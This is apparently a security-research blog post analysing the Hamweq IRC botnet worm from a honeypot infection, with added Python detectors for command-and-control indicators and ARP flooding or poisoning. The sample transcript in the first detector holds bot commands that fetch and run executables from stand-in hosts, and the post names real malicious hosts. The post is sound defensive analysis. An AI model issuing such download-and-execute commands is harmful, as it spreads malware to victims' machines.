
Hamweq Worm Brings a Mountain of Malware

2013-01-15

[Image: 20130115_hamweq_think-with-your-dipstick-jimmy]

For an early Christmas present, the Internet gave our ThreatVision research team a worm called Hamweq. It’s the kind of unsubtle “gift” that keeps on giving, though most other people wouldn’t appreciate its prolific malicious activity.

The Hamweq malware, which had copied itself onto one of our UK-based research honeypots in mid-December, uses an IRC server in China to receive command-and-control instructions, and behaves as a typical botnet client. As a worm, it also attempts to exploit vulnerabilities in Windows computers in order to propagate; this appears to be how it ended up on the honeypot in the first place.

Our sample continues to actively retrieve new malware payloads from a variety of Web hosts located around the world, and periodically engages in a wide range of undesirable activities, including scanning for other vulnerable hosts and ARP poisoning. It was also pretty damn rude — the dialog box above is what you’d see about 30 seconds after the infection took hold.

[Image: 20130115_hamweq_irc_download_command_crop]

Initially, the worm performs a geolocation lookup of the infected machine’s IP address using a free online service. Once it has a result, it connects to the malicious IRC server at n.janalot.com and embeds the two-letter country code of the infected machine in the bot’s IRC “nickname.” After the bot joins a particular channel on the server, it receives a private IRC message containing simple commands (shown above) to retrieve and execute malware.
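The following is an added example (not code from the original post, and not Hamweq’s own protocol) showing how a network analyst might parse a client-side IRC transcript and extract the indicators described above: the country-coded nickname, the server, the channel joined, and any download commands delivered by private message. The session lines are constructed, the bracketed “[CC]” nickname layout and the “!dl” command syntax are assumptions, and the hosts and URLs are documentation addresses rather than anything observed. The geolocation lookup that precedes the IRC connection is an HTTP request to an unnamed service and is not modelled here.

```python
import re

# Assumptions for this example (the post only says the country code is
# embedded in the nick and that commands arrive by private message):
#   - the bot's nick starts with a bracketed two-letter country code, "[GB]..."
#   - download commands carry an http(s) URL to an executable
CC_NICK_RE = re.compile(r"^\[([A-Z]{2})\]")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd")


def parse_irc(line):
    """Split one RFC 1459 message into prefix, command and params.
    Lines the client sent have no ':prefix'; lines from the server do."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return None
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return {"prefix": prefix, "command": parts[0].upper(), "params": params}


def extract_c2_indicators(session_lines):
    """Walk a mixed client/server transcript and collect C2 indicators."""
    ind = {"nick": None, "country": None, "server": None, "channels": [],
           "private_commands": [], "download_urls": []}
    for raw in session_lines:
        msg = parse_irc(raw)
        if msg is None:
            continue
        cmd, p, sent_by_us = msg["command"], msg["params"], msg["prefix"] is None
        if cmd == "NICK" and p and sent_by_us:
            ind["nick"] = p[0]
            m = CC_NICK_RE.match(p[0])
            if m:
                ind["country"] = m.group(1)
        elif cmd == "001" and msg["prefix"]:          # RPL_WELCOME names the server
            ind["server"] = msg["prefix"]
        elif cmd == "JOIN" and p and sent_by_us:
            ind["channels"].append(p[0])
        elif cmd == "PRIVMSG" and len(p) >= 2 and p[0] == ind["nick"]:
            # Addressed to our nick, not a channel: this is the private command path.
            ind["private_commands"].append(p[1])
            for url in URL_RE.findall(p[1]):
                url = url.rstrip(".,;")
                if url.lower().endswith(EXEC_EXT):
                    ind["download_urls"].append(url)
    return ind


# Constructed transcript (not captured traffic); hosts use RFC 5737 / example addresses.
SESSION = [
    "NICK [GB]kdfj92a",
    "USER kdfj92a 0 * :kdfj92a",
    ":irc.example.net 001 [GB]kdfj92a :Welcome",
    "JOIN #upd",
    ":[GB]kdfj92a!bot@203.0.113.7 JOIN :#upd",
    ":ops!op@irc.example.net PRIVMSG #upd :hello all",
    ":ops!op@irc.example.net PRIVMSG [GB]kdfj92a :!dl http://192.0.2.10/files/update.exe 1",
    ":ops!op@irc.example.net PRIVMSG [GB]kdfj92a :!dl http://192.0.2.11/x.exe 1",
]

if __name__ == "__main__":
    for k, v in extract_c2_indicators(SESSION).items():
        print(f"{k}: {v}")
```

The same parser works on a pcap-derived TCP stream once it is split into lines; the point is that the country-coded nickname plus a private message carrying an executable URL is a compact behavioural signature for this style of IRC bot.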

[Image: 20130115_hamweq_payloads_crop]

This Hamweq sample is a prolific downloader. Its payloads are a hot mess of spam relayers, keyloggers, brute-force scanning tools, droppers, and multiple RATs. During a 16-minute period on a single testbed, the malware (or its payloads) downloaded 20 malicious applications, 15 of which were unique.

[Image: 20130115_hamweq_geolocation-of-payloads_crop]

The samples originate from a variety of IP addresses in Russia, all on the 146.185.246.x subnet; the IP range is controlled by a company called cheaphosts.ru. While this might just be a case of malware distributors abusing a legitimate business, it is certainly suspicious that the cheaphosts.ru domain was only registered on December 12th of last year, less than a week before we first saw the worm.

In fact, the worm (or one of its payloads) was so enthusiastic about its work that it literally knocked the network hosting the testbed offline for a time by flooding it with ARP requests. We had to power-cycle the router before it would respond to normal network requests again.
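The ARP storm described here, and the ARP poisoning mentioned earlier, both leave a simple footprint on the wire. The following is an added example (not code from the original post) of the two checks a responder would run over a capture: a sliding-window count of ARP requests per source MAC to catch the flood, and a check for any IP that ARP replies bind to more than one MAC to catch poisoning. The input lines are constructed in tcpdump “-n -e arp” style and are not a capture from the worm; the MAC and IP addresses are invented.

```python
import re
from collections import defaultdict

# tcpdump "-n -e arp" style lines. Groups: wall-clock timestamp, source MAC,
# then either "Request who-has TARGET tell SENDER" or "Reply IP is-at MAC".
ARP_LINE = re.compile(
    r"^(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d\.\d+) "
    r"(?P<src>[0-9a-f:]{17}) > [0-9a-f:]{17}, ARP, "
    r"(?:Request who-has (?P<target>[\d.]+) tell (?P<sender>[\d.]+)"
    r"|Reply (?P<ip>[\d.]+) is-at (?P<mac>[0-9a-f:]{17}))"
)


def parse_arp_line(line):
    """Return a dict for one ARP line, or None if the line is not ARP."""
    m = ARP_LINE.match(line)
    if not m:
        return None
    ts = int(m["h"]) * 3600 + int(m["m"]) * 60 + float(m["s"])
    if m["target"] is not None:
        return {"ts": ts, "src": m["src"], "kind": "request",
                "target": m["target"], "sender": m["sender"]}
    return {"ts": ts, "src": m["src"], "kind": "reply",
            "ip": m["ip"], "mac": m["mac"]}


def detect_arp_flood(lines, window=1.0, threshold=100):
    """Map source MAC -> peak number of requests in any `window` seconds,
    for MACs whose peak exceeds `threshold` (sliding window over sorted times)."""
    times = defaultdict(list)
    for line in lines:
        rec = parse_arp_line(line)
        if rec and rec["kind"] == "request":
            times[rec["src"]].append(rec["ts"])
    offenders = {}
    for mac, ts in times.items():
        ts.sort()
        start = peak = 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            offenders[mac] = peak
    return offenders


def detect_arp_poisoning(lines):
    """Map IP -> sorted MACs for IPs that ARP replies bind to more than one
    MAC, which is the fingerprint of a poisoning attempt."""
    claims = defaultdict(set)
    for line in lines:
        rec = parse_arp_line(line)
        if rec and rec["kind"] == "reply":
            claims[rec["ip"]].add(rec["mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def build_sample_capture():
    """Constructed sample (not captured from the worm): one normal host, the
    real gateway, and one infected host that both floods and poisons."""
    normal, gateway, infected = "00:0c:29:11:11:11", "00:0c:29:00:00:01", "00:0c:29:de:ad:00"
    bcast = "ff:ff:ff:ff:ff:ff"
    lines = [f"12:00:0{i}.000000 {normal} > {bcast}, ARP, Request who-has 192.168.1.{10 + i} tell 192.168.1.20"
             for i in range(3)]
    lines.append(f"12:00:00.000500 {gateway} > {normal}, ARP, Reply 192.168.1.1 is-at {gateway}")
    # 500 who-has requests in half a second, walking the /24: the ARP storm.
    for i in range(500):
        lines.append(f"12:00:{5 + i * 0.001:09.6f} {infected} > {bcast}, ARP, "
                     f"Request who-has 192.168.1.{i % 254 + 1} tell 192.168.1.50")
    # Unsolicited reply claiming the gateway's IP: the poisoning attempt.
    lines.append(f"12:00:06.000000 {infected} > {bcast}, ARP, Reply 192.168.1.1 is-at {infected}")
    return lines


if __name__ == "__main__":
    capture = build_sample_capture()
    print("ARP flood sources:", detect_arp_flood(capture))
    print("Poisoned bindings:", detect_arp_poisoning(capture))
```

The threshold of 100 requests per second is a starting point, not a rule; a legitimate scanner or a busy DHCP server can approach it, so tune it against a baseline of the network in question before alerting on it.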

While many of the payloads were unknown to antivirus vendors at the time they first came down the pipe to the infected testbed, within a matter of hours AV detection rates (as unscientifically measured by counting detections on VirusTotal) had climbed from just a handful of vendors to nearly all of the companies represented on that service.

In my next post, I’ll discuss the behavior of these various malware payloads, and how to detect them.
